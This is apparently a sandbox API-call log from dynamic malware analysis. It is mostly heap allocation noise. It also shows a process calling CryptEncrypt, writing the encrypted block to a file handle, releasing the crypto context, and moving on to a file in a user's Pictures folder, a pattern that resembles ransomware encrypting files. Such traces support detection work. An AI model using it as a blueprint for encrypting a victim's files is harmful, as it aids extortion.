RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0087.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0087.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0087.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0087.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0087.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0087.574] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0087.575] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2640, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2640*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0087.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.576] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.577] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.577] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0087.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0087.578] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.578] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x200) returned 1 [0087.578] CharLowerBuffW (in: lpsz="byte[513]", cchLength=0x9 | out: lpsz="byte[513]") returned 0x9 [0087.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.579] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e8e88*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x200 | out: pbData=0x43e8e88*, pdwDataLen=0x144e790*=0x200) returned 1 [0087.579] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.579] WriteFile (in: hFile=0x298, lpBuffer=0x43e8288*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43e8288*, lpNumberOfBytesWritten=0x144f194*=0x200, lpOverlapped=0x0) returned 1 [0087.580] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0087.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca280, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.580] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0087.580] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.628] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.628] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.629] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0087.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.629] FreeLibrary (hLibModule=0x756e0000) returned 1 [0087.629] CloseHandle (hObject=0x258) returned 1 [0087.629] CloseHandle (hObject=0x298) returned 1 [0087.630] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", 